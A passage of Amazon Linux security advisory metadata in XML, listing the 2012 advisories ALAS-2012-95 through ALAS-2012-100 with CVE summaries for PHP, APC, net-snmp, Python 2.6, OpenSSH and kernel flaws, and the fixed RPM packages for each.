arch="i686"><filename>Packages/postgresql8-libs-8.4.12-1.35.amzn1.i686.rpm</filename></package><package name="postgresql8-plpython" version="8.4.12" release="1.35.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-plpython-8.4.12-1.35.amzn1.i686.rpm</filename></package><package name="postgresql8-devel" version="8.4.12" release="1.35.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-devel-8.4.12-1.35.amzn1.i686.rpm</filename></package><package name="postgresql8-plpython" version="8.4.12" release="1.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-plpython-8.4.12-1.35.amzn1.x86_64.rpm</filename></package><package name="postgresql8-devel" version="8.4.12" release="1.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-devel-8.4.12-1.35.amzn1.x86_64.rpm</filename></package><package name="postgresql8-debuginfo" version="8.4.12" release="1.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-debuginfo-8.4.12-1.35.amzn1.x86_64.rpm</filename></package><package name="postgresql8-plperl" version="8.4.12" release="1.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-plperl-8.4.12-1.35.amzn1.x86_64.rpm</filename></package><package name="postgresql8-contrib" version="8.4.12" release="1.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-contrib-8.4.12-1.35.amzn1.x86_64.rpm</filename></package><package name="postgresql8" version="8.4.12" release="1.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-8.4.12-1.35.amzn1.x86_64.rpm</filename></package><package name="postgresql8-test" version="8.4.12" release="1.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-test-8.4.12-1.35.amzn1.x86_64.rpm</filename></package><package name="postgresql8-docs" version="8.4.12" release="1.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-docs-8.4.12-1.35.amzn1.x86_64.rpm</filename></package><package name="postgresql8-server" version="8.4.12" release="1.35.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/postgresql8-server-8.4.12-1.35.amzn1.x86_64.rpm</filename></package><package name="postgresql8-libs" version="8.4.12" release="1.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-libs-8.4.12-1.35.amzn1.x86_64.rpm</filename></package><package name="postgresql8-pltcl" version="8.4.12" release="1.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-pltcl-8.4.12-1.35.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-95</id><title>Amazon Linux - ALAS-2012-95: medium priority package update for php</title><issued date="2012-07-05 16:09:00" /><updated date="2014-09-14 16:25:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-2386:
Multiple integer overflow flaws, leading to heap-based buffer overflows, were found in the way the PHP phar extension processed certain fields of tar archive files. A remote attacker could provide a specially-crafted tar archive file that, when processed by a PHP application using the phar extension, could cause the application to crash or, potentially, execute arbitrary code with the privileges of the user running PHP.
Integer overflow in the phar_parse_tarfile function in tar.c in the phar extension in PHP before 5.3.14 and 5.4.x before 5.4.4 allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a crafted tar file that triggers a heap-based buffer overflow.
823594:
CVE-2012-2386 php: Integer overflow leading to heap-buffer overflow in the Phar extension
CVE-2012-2143:
The crypt_des (aka DES-based crypt) function in FreeBSD before 9.0-RELEASE-p2, as used in PHP, PostgreSQL, and other products, does not process the complete cleartext password if this password contains a 0x80 character, which makes it easier for context-dependent attackers to obtain access via an authentication attempt with an initial substring of the intended password, as demonstrated by a Unicode password.
A flaw was found in the way the crypt() password hashing function from the optional PostgreSQL pgcrypto contrib module performed password transformation when used with the DES algorithm. If the password string to be hashed contained the 0x80 byte value, the remainder of the string was ignored when calculating the hash, significantly reducing the password strength. This made brute-force guessing more efficient as the whole password was not required to gain access to protected resources.
A flaw was found in the DES algorithm implementation in the crypt() password hashing function in PHP. If the password string to be hashed contained certain characters, the remainder of the string was ignored when calculating the hash, significantly reducing the password strength.
816956:
CVE-2012-2143 BSD crypt(): DES encrypted password weakness
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2143" title="" id="CVE-2012-2143" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2386" title="" id="CVE-2012-2386" type="cve" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="php-intl" version="5.3.14" release="2.21.amzn1" epoch="0" arch="i686"><filename>Packages/php-intl-5.3.14-2.21.amzn1.i686.rpm</filename></package><package name="php-mysql" version="5.3.14" release="2.21.amzn1" epoch="0" arch="i686"><filename>Packages/php-mysql-5.3.14-2.21.amzn1.i686.rpm</filename></package><package name="php-mbstring" version="5.3.14" release="2.21.amzn1" epoch="0" arch="i686"><filename>Packages/php-mbstring-5.3.14-2.21.amzn1.i686.rpm</filename></package><package name="php-xmlrpc" version="5.3.14" release="2.21.amzn1" epoch="0" arch="i686"><filename>Packages/php-xmlrpc-5.3.14-2.21.amzn1.i686.rpm</filename></package><package name="php-recode" version="5.3.14" release="2.21.amzn1" epoch="0" arch="i686"><filename>Packages/php-recode-5.3.14-2.21.amzn1.i686.rpm</filename></package><package name="php-xml" version="5.3.14" release="2.21.amzn1" epoch="0" arch="i686"><filename>Packages/php-xml-5.3.14-2.21.amzn1.i686.rpm</filename></package><package name="php-embedded" version="5.3.14" release="2.21.amzn1" epoch="0" arch="i686"><filename>Packages/php-embedded-5.3.14-2.21.amzn1.i686.rpm</filename></package><package name="php-mcrypt" version="5.3.14" release="2.21.amzn1" epoch="0" arch="i686"><filename>Packages/php-mcrypt-5.3.14-2.21.amzn1.i686.rpm</filename></package><package name="php-bcmath" version="5.3.14" release="2.21.amzn1" epoch="0" arch="i686"><filename>Packages/php-bcmath-5.3.14-2.21.amzn1.i686.rpm</filename></package><package name="php-dba" version="5.3.14" release="2.21.amzn1" epoch="0" arch="i686"><filename>Packages/php-dba-5.3.14-2.21.amzn1.i686.rpm</filename></package><package name="php-odbc" 
version="5.3.14" release="2.21.amzn1" epoch="0" arch="i686"><filename>Packages/php-odbc-5.3.14-2.21.amzn1.i686.rpm</filename></package><package name="php-soap" version="5.3.14" release="2.21.amzn1" epoch="0" arch="i686"><filename>Packages/php-soap-5.3.14-2.21.amzn1.i686.rpm</filename></package><package name="php-debuginfo" version="5.3.14" release="2.21.amzn1" epoch="0" arch="i686"><filename>Packages/php-debuginfo-5.3.14-2.21.amzn1.i686.rpm</filename></package><package name="php-tidy" version="5.3.14" release="2.21.amzn1" epoch="0" arch="i686"><filename>Packages/php-tidy-5.3.14-2.21.amzn1.i686.rpm</filename></package><package name="php-devel" version="5.3.14" release="2.21.amzn1" epoch="0" arch="i686"><filename>Packages/php-devel-5.3.14-2.21.amzn1.i686.rpm</filename></package><package name="php-snmp" version="5.3.14" release="2.21.amzn1" epoch="0" arch="i686"><filename>Packages/php-snmp-5.3.14-2.21.amzn1.i686.rpm</filename></package><package name="php-pgsql" version="5.3.14" release="2.21.amzn1" epoch="0" arch="i686"><filename>Packages/php-pgsql-5.3.14-2.21.amzn1.i686.rpm</filename></package><package name="php-process" version="5.3.14" release="2.21.amzn1" epoch="0" arch="i686"><filename>Packages/php-process-5.3.14-2.21.amzn1.i686.rpm</filename></package><package name="php-fpm" version="5.3.14" release="2.21.amzn1" epoch="0" arch="i686"><filename>Packages/php-fpm-5.3.14-2.21.amzn1.i686.rpm</filename></package><package name="php-mysqlnd" version="5.3.14" release="2.21.amzn1" epoch="0" arch="i686"><filename>Packages/php-mysqlnd-5.3.14-2.21.amzn1.i686.rpm</filename></package><package name="php-ldap" version="5.3.14" release="2.21.amzn1" epoch="0" arch="i686"><filename>Packages/php-ldap-5.3.14-2.21.amzn1.i686.rpm</filename></package><package name="php" version="5.3.14" release="2.21.amzn1" epoch="0" arch="i686"><filename>Packages/php-5.3.14-2.21.amzn1.i686.rpm</filename></package><package name="php-pspell" version="5.3.14" release="2.21.amzn1" epoch="0" 
arch="i686"><filename>Packages/php-pspell-5.3.14-2.21.amzn1.i686.rpm</filename></package><package name="php-imap" version="5.3.14" release="2.21.amzn1" epoch="0" arch="i686"><filename>Packages/php-imap-5.3.14-2.21.amzn1.i686.rpm</filename></package><package name="php-mssql" version="5.3.14" release="2.21.amzn1" epoch="0" arch="i686"><filename>Packages/php-mssql-5.3.14-2.21.amzn1.i686.rpm</filename></package><package name="php-common" version="5.3.14" release="2.21.amzn1" epoch="0" arch="i686"><filename>Packages/php-common-5.3.14-2.21.amzn1.i686.rpm</filename></package><package name="php-cli" version="5.3.14" release="2.21.amzn1" epoch="0" arch="i686"><filename>Packages/php-cli-5.3.14-2.21.amzn1.i686.rpm</filename></package><package name="php-pdo" version="5.3.14" release="2.21.amzn1" epoch="0" arch="i686"><filename>Packages/php-pdo-5.3.14-2.21.amzn1.i686.rpm</filename></package><package name="php-gd" version="5.3.14" release="2.21.amzn1" epoch="0" arch="i686"><filename>Packages/php-gd-5.3.14-2.21.amzn1.i686.rpm</filename></package><package name="php-mssql" version="5.3.14" release="2.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-mssql-5.3.14-2.21.amzn1.x86_64.rpm</filename></package><package name="php-cli" version="5.3.14" release="2.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-cli-5.3.14-2.21.amzn1.x86_64.rpm</filename></package><package name="php-fpm" version="5.3.14" release="2.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-fpm-5.3.14-2.21.amzn1.x86_64.rpm</filename></package><package name="php-pgsql" version="5.3.14" release="2.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-pgsql-5.3.14-2.21.amzn1.x86_64.rpm</filename></package><package name="php-common" version="5.3.14" release="2.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-common-5.3.14-2.21.amzn1.x86_64.rpm</filename></package><package name="php-bcmath" version="5.3.14" release="2.21.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/php-bcmath-5.3.14-2.21.amzn1.x86_64.rpm</filename></package><package name="php-embedded" version="5.3.14" release="2.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-embedded-5.3.14-2.21.amzn1.x86_64.rpm</filename></package><package name="php-xmlrpc" version="5.3.14" release="2.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-xmlrpc-5.3.14-2.21.amzn1.x86_64.rpm</filename></package><package name="php-recode" version="5.3.14" release="2.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-recode-5.3.14-2.21.amzn1.x86_64.rpm</filename></package><package name="php-gd" version="5.3.14" release="2.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-gd-5.3.14-2.21.amzn1.x86_64.rpm</filename></package><package name="php-pspell" version="5.3.14" release="2.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-pspell-5.3.14-2.21.amzn1.x86_64.rpm</filename></package><package name="php-odbc" version="5.3.14" release="2.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-odbc-5.3.14-2.21.amzn1.x86_64.rpm</filename></package><package name="php" version="5.3.14" release="2.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-5.3.14-2.21.amzn1.x86_64.rpm</filename></package><package name="php-mbstring" version="5.3.14" release="2.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-mbstring-5.3.14-2.21.amzn1.x86_64.rpm</filename></package><package name="php-soap" version="5.3.14" release="2.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-soap-5.3.14-2.21.amzn1.x86_64.rpm</filename></package><package name="php-intl" version="5.3.14" release="2.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-intl-5.3.14-2.21.amzn1.x86_64.rpm</filename></package><package name="php-devel" version="5.3.14" release="2.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-devel-5.3.14-2.21.amzn1.x86_64.rpm</filename></package><package name="php-ldap" version="5.3.14" release="2.21.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/php-ldap-5.3.14-2.21.amzn1.x86_64.rpm</filename></package><package name="php-mysqlnd" version="5.3.14" release="2.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-mysqlnd-5.3.14-2.21.amzn1.x86_64.rpm</filename></package><package name="php-dba" version="5.3.14" release="2.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-dba-5.3.14-2.21.amzn1.x86_64.rpm</filename></package><package name="php-debuginfo" version="5.3.14" release="2.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-debuginfo-5.3.14-2.21.amzn1.x86_64.rpm</filename></package><package name="php-xml" version="5.3.14" release="2.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-xml-5.3.14-2.21.amzn1.x86_64.rpm</filename></package><package name="php-tidy" version="5.3.14" release="2.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-tidy-5.3.14-2.21.amzn1.x86_64.rpm</filename></package><package name="php-process" version="5.3.14" release="2.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-process-5.3.14-2.21.amzn1.x86_64.rpm</filename></package><package name="php-pdo" version="5.3.14" release="2.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-pdo-5.3.14-2.21.amzn1.x86_64.rpm</filename></package><package name="php-mcrypt" version="5.3.14" release="2.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-mcrypt-5.3.14-2.21.amzn1.x86_64.rpm</filename></package><package name="php-imap" version="5.3.14" release="2.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-imap-5.3.14-2.21.amzn1.x86_64.rpm</filename></package><package name="php-mysql" version="5.3.14" release="2.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-mysql-5.3.14-2.21.amzn1.x86_64.rpm</filename></package><package name="php-snmp" version="5.3.14" release="2.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-snmp-5.3.14-2.21.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" 
author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-96</id><title>Amazon Linux - ALAS-2012-96: low priority package update for php-pecl-apc</title><issued date="2012-07-05 16:13:00" /><updated date="2014-09-14 16:26:00" /><severity>low</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2010-3294:
Cross-site scripting (XSS) vulnerability in apc.php in the Alternative PHP Cache (APC) extension before 3.1.4 for PHP allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
A cross-site scripting (XSS) flaw was found in the "apc.php" script, which provides a detailed analysis of the internal workings of APC and is shipped as part of the APC extension documentation. A remote attacker could possibly use this flaw to conduct a cross-site scripting attack.
634334:
CVE-2010-3294 php-pecl-apc: potential XSS in apc.php
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3294" title="" id="CVE-2010-3294" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:0811.html" title="" id="RHSA-2012:0811" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="php-pecl-apc" version="3.1.10" release="1.4.amzn1" epoch="0" arch="i686"><filename>Packages/php-pecl-apc-3.1.10-1.4.amzn1.i686.rpm</filename></package><package name="php-pecl-apc-debuginfo" version="3.1.10" release="1.4.amzn1" epoch="0" arch="i686"><filename>Packages/php-pecl-apc-debuginfo-3.1.10-1.4.amzn1.i686.rpm</filename></package><package name="php-pecl-apc-devel" version="3.1.10" release="1.4.amzn1" epoch="0" arch="i686"><filename>Packages/php-pecl-apc-devel-3.1.10-1.4.amzn1.i686.rpm</filename></package><package name="php-pecl-apc-devel" version="3.1.10" release="1.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-pecl-apc-devel-3.1.10-1.4.amzn1.x86_64.rpm</filename></package><package name="php-pecl-apc-debuginfo" version="3.1.10" release="1.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-pecl-apc-debuginfo-3.1.10-1.4.amzn1.x86_64.rpm</filename></package><package name="php-pecl-apc" version="3.1.10" release="1.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-pecl-apc-3.1.10-1.4.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-97</id><title>Amazon Linux - ALAS-2012-97: medium priority package update for net-snmp</title><issued date="2012-07-05 16:15:00" /><updated date="2014-09-14 16:31:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-2141:
Array index error in the handle_nsExtendOutput2Table function in agent/mibgroup/agent/extend.c in Net-SNMP 5.7.1 allows remote authenticated users to cause a denial of service (out-of-bounds read and snmpd crash) via an SNMP GET request for an entry not in the extension table.
An out-of-bounds buffer read flaw was found in the net-snmp agent. A remote attacker with read privileges to a Management Information Base (MIB) subtree handled by the "extend" directive (in "/etc/snmp/snmpd.conf") could use this flaw to crash snmpd via a crafted SNMP GET request.
An array index error, leading to an out-of-bounds buffer read flaw, was found in the way the net-snmp agent looked up entries in the extension table. A remote attacker with read privileges to a Management Information Base (MIB) subtree handled by the "extend" directive (in "/etc/snmp/snmpd.conf") could use this flaw to crash snmpd via a crafted SNMP GET request.
815813:
CVE-2012-2141 net-snmp: Array index error, leading to out-of-bounds heap-based buffer read (snmpd crash)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2141" title="" id="CVE-2012-2141" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:0876.html" title="" id="RHSA-2012:0876" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="net-snmp-perl" version="5.5" release="41.10.amzn1" epoch="1" arch="i686"><filename>Packages/net-snmp-perl-5.5-41.10.amzn1.i686.rpm</filename></package><package name="net-snmp-utils" version="5.5" release="41.10.amzn1" epoch="1" arch="i686"><filename>Packages/net-snmp-utils-5.5-41.10.amzn1.i686.rpm</filename></package><package name="net-snmp-libs" version="5.5" release="41.10.amzn1" epoch="1" arch="i686"><filename>Packages/net-snmp-libs-5.5-41.10.amzn1.i686.rpm</filename></package><package name="net-snmp-python" version="5.5" release="41.10.amzn1" epoch="1" arch="i686"><filename>Packages/net-snmp-python-5.5-41.10.amzn1.i686.rpm</filename></package><package name="net-snmp-debuginfo" version="5.5" release="41.10.amzn1" epoch="1" arch="i686"><filename>Packages/net-snmp-debuginfo-5.5-41.10.amzn1.i686.rpm</filename></package><package name="net-snmp-devel" version="5.5" release="41.10.amzn1" epoch="1" arch="i686"><filename>Packages/net-snmp-devel-5.5-41.10.amzn1.i686.rpm</filename></package><package name="net-snmp" version="5.5" release="41.10.amzn1" epoch="1" arch="i686"><filename>Packages/net-snmp-5.5-41.10.amzn1.i686.rpm</filename></package><package name="net-snmp-python" version="5.5" release="41.10.amzn1" epoch="1" arch="x86_64"><filename>Packages/net-snmp-python-5.5-41.10.amzn1.x86_64.rpm</filename></package><package name="net-snmp" version="5.5" release="41.10.amzn1" epoch="1" arch="x86_64"><filename>Packages/net-snmp-5.5-41.10.amzn1.x86_64.rpm</filename></package><package name="net-snmp-debuginfo" version="5.5" release="41.10.amzn1" epoch="1" 
arch="x86_64"><filename>Packages/net-snmp-debuginfo-5.5-41.10.amzn1.x86_64.rpm</filename></package><package name="net-snmp-libs" version="5.5" release="41.10.amzn1" epoch="1" arch="x86_64"><filename>Packages/net-snmp-libs-5.5-41.10.amzn1.x86_64.rpm</filename></package><package name="net-snmp-devel" version="5.5" release="41.10.amzn1" epoch="1" arch="x86_64"><filename>Packages/net-snmp-devel-5.5-41.10.amzn1.x86_64.rpm</filename></package><package name="net-snmp-perl" version="5.5" release="41.10.amzn1" epoch="1" arch="x86_64"><filename>Packages/net-snmp-perl-5.5-41.10.amzn1.x86_64.rpm</filename></package><package name="net-snmp-utils" version="5.5" release="41.10.amzn1" epoch="1" arch="x86_64"><filename>Packages/net-snmp-utils-5.5-41.10.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-98</id><title>Amazon Linux - ALAS-2012-98: low priority package update for python26</title><issued date="2012-07-05 16:16:00" /><updated date="2014-09-14 16:31:00" /><severity>low</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-1150:
Python before 2.6.8, 2.7.x before 2.7.3, 3.x before 3.1.5, and 3.2.x before 3.2.3 computes hash values without restricting the ability to trigger hash collisions predictably, which allows context-dependent attackers to cause a denial of service (CPU consumption) via crafted input to an application that maintains a hash table.
A denial of service flaw was found in the implementation of associative arrays (dictionaries) in Python. An attacker able to supply a large number of inputs to a Python application (such as HTTP POST request parameters sent to a web application) that are used as keys when inserting data into an array could trigger multiple hash function collisions, making array operations take an excessive amount of CPU time. To mitigate this issue, randomization has been added to the hash function to reduce the chance of an attacker successfully causing intentional collisions.
750555:
CVE-2012-1150 python: hash table collisions CPU usage DoS (oCERT-2011-003)
CVE-2012-0845:
SimpleXMLRPCServer.py in SimpleXMLRPCServer in Python before 2.6.8, 2.7.x before 2.7.3, 3.x before 3.1.5, and 3.2.x before 3.2.3 allows remote attackers to cause a denial of service (infinite loop and CPU consumption) via an XML-RPC POST request that contains a smaller amount of data than specified by the Content-Length header.
A flaw was found in the way the Python SimpleXMLRPCServer module handled clients disconnecting prematurely. A remote attacker could use this flaw to cause excessive CPU consumption on a server using SimpleXMLRPCServer.
789790:
CVE-2012-0845 python: SimpleXMLRPCServer CPU usage DoS via malformed XML-RPC request
CVE-2011-4944:
Python 2.6 through 3.2 creates ~/.pypirc with world-readable permissions before changing them after data has been written, which introduces a race condition that allows local users to obtain a username and password by reading this file.
A race condition was found in the way the Python distutils module set file permissions during the creation of the .pypirc file. If a local user had access to the home directory of another user who is running distutils, they could use this flaw to gain access to that user's .pypirc file, which can contain usernames and passwords for code repositories.
758905:
CVE-2011-4944 python: distutils creates ~/.pypirc insecurely
CVE-2011-4940:
The list_directory function in Lib/SimpleHTTPServer.py in SimpleHTTPServer in Python before 2.5.6c1, 2.6.x before 2.6.7 rc2, and 2.7.x before 2.7.2 does not place a charset parameter in the Content-Type HTTP header, which makes it easier for remote attackers to conduct cross-site scripting (XSS) attacks against Internet Explorer 7 via UTF-7 encoding.
A flaw was found in the way the Python SimpleHTTPServer module generated directory listings. An attacker able to upload a file with a specially-crafted name to a server could possibly perform a cross-site scripting (XSS) attack against victims visiting a listing page generated by SimpleHTTPServer, for a directory containing the crafted file (if the victims were using certain web browsers).
803500:
CVE-2011-4940 python: potential XSS in SimpleHTTPServer's list_directory()
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4940" title="" id="CVE-2011-4940" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4944" title="" id="CVE-2011-4944" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0845" title="" id="CVE-2012-0845" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1150" title="" id="CVE-2012-1150" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:0744.html" title="" id="RHSA-2012:0744" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="python26" version="2.6.8" release="2.28.amzn1" epoch="0" arch="i686"><filename>Packages/python26-2.6.8-2.28.amzn1.i686.rpm</filename></package><package name="python26-test" version="2.6.8" release="2.28.amzn1" epoch="0" arch="i686"><filename>Packages/python26-test-2.6.8-2.28.amzn1.i686.rpm</filename></package><package name="python26-debuginfo" version="2.6.8" release="2.28.amzn1" epoch="0" arch="i686"><filename>Packages/python26-debuginfo-2.6.8-2.28.amzn1.i686.rpm</filename></package><package name="python26-libs" version="2.6.8" release="2.28.amzn1" epoch="0" arch="i686"><filename>Packages/python26-libs-2.6.8-2.28.amzn1.i686.rpm</filename></package><package name="python26-devel" version="2.6.8" release="2.28.amzn1" epoch="0" arch="i686"><filename>Packages/python26-devel-2.6.8-2.28.amzn1.i686.rpm</filename></package><package name="python26-tools" version="2.6.8" release="2.28.amzn1" epoch="0" arch="i686"><filename>Packages/python26-tools-2.6.8-2.28.amzn1.i686.rpm</filename></package><package name="python26-devel" version="2.6.8" release="2.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/python26-devel-2.6.8-2.28.amzn1.x86_64.rpm</filename></package><package name="python26-debuginfo" version="2.6.8" release="2.28.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/python26-debuginfo-2.6.8-2.28.amzn1.x86_64.rpm</filename></package><package name="python26-test" version="2.6.8" release="2.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/python26-test-2.6.8-2.28.amzn1.x86_64.rpm</filename></package><package name="python26-tools" version="2.6.8" release="2.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/python26-tools-2.6.8-2.28.amzn1.x86_64.rpm</filename></package><package name="python26-libs" version="2.6.8" release="2.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/python26-libs-2.6.8-2.28.amzn1.x86_64.rpm</filename></package><package name="python26" version="2.6.8" release="2.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/python26-2.6.8-2.28.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-99</id><title>Amazon Linux - ALAS-2012-99: medium priority package update for openssh</title><issued date="2012-07-05 16:18:00" /><updated date="2014-09-14 16:32:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2011-5000:
The ssh_gssapi_parse_ename function in gss-serv.c in OpenSSH 5.8 and earlier, when gssapi-with-mic authentication is enabled, allows remote authenticated users to cause a denial of service (memory consumption) via a large value in a certain length field. NOTE: there may be limited scenarios in which this issue is relevant.
A denial of service flaw was found in the OpenSSH GSSAPI authentication implementation. A remote, authenticated user could use this flaw to make the OpenSSH server daemon (sshd) use an excessive amount of memory, leading to a denial of service. GSSAPI authentication is enabled by default ("GSSAPIAuthentication yes" in "/etc/ssh/sshd_config").
809938:
CVE-2011-5000 openssh: post-authentication resource exhaustion bug via GSSAPI
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-5000" title="" id="CVE-2011-5000" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:0884.html" title="" id="RHSA-2012:0884" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="openssh-ldap" version="5.3p1" release="81.17.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-ldap-5.3p1-81.17.amzn1.i686.rpm</filename></package><package name="openssh-debuginfo" version="5.3p1" release="81.17.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-debuginfo-5.3p1-81.17.amzn1.i686.rpm</filename></package><package name="openssh" version="5.3p1" release="81.17.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-5.3p1-81.17.amzn1.i686.rpm</filename></package><package name="openssh-server" version="5.3p1" release="81.17.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-server-5.3p1-81.17.amzn1.i686.rpm</filename></package><package name="openssh-clients" version="5.3p1" release="81.17.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-clients-5.3p1-81.17.amzn1.i686.rpm</filename></package><package name="pam_ssh_agent_auth" version="0.9" release="81.17.amzn1" epoch="0" arch="i686"><filename>Packages/pam_ssh_agent_auth-0.9-81.17.amzn1.i686.rpm</filename></package><package name="openssh-server" version="5.3p1" release="81.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-server-5.3p1-81.17.amzn1.x86_64.rpm</filename></package><package name="openssh" version="5.3p1" release="81.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-5.3p1-81.17.amzn1.x86_64.rpm</filename></package><package name="openssh-debuginfo" version="5.3p1" release="81.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-debuginfo-5.3p1-81.17.amzn1.x86_64.rpm</filename></package><package name="openssh-clients" version="5.3p1" release="81.17.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/openssh-clients-5.3p1-81.17.amzn1.x86_64.rpm</filename></package><package name="openssh-ldap" version="5.3p1" release="81.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-ldap-5.3p1-81.17.amzn1.x86_64.rpm</filename></package><package name="pam_ssh_agent_auth" version="0.9" release="81.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/pam_ssh_agent_auth-0.9-81.17.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-100</id><title>Amazon Linux - ALAS-2012-100: medium priority package update for kernel</title><issued date="2012-07-05 16:19:00" /><updated date="2014-09-14 16:33:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-2372:
The rds_ib_xmit function in net/rds/ib_send.c in the Reliable Datagram Sockets (RDS) protocol implementation in the Linux kernel 3.7.4 and earlier allows local users to cause a denial of service (BUG_ON and kernel panic) by establishing an RDS connection with the source IP address equal to the IPoIB interface's own IP address, as demonstrated by rds-ping.
822754:
CVE-2012-2372 kernel: rds-ping causes kernel panic
* A flaw was found in the Linux kernel's Reliable Datagram Sockets (RDS) protocol implementation. A local, unprivileged user could use this flaw to cause a denial of service.
* A flaw in the Reliable Datagram Sockets (RDS) protocol implementation could allow a local, unprivileged user to cause a denial of service.
CVE-2011-4131:
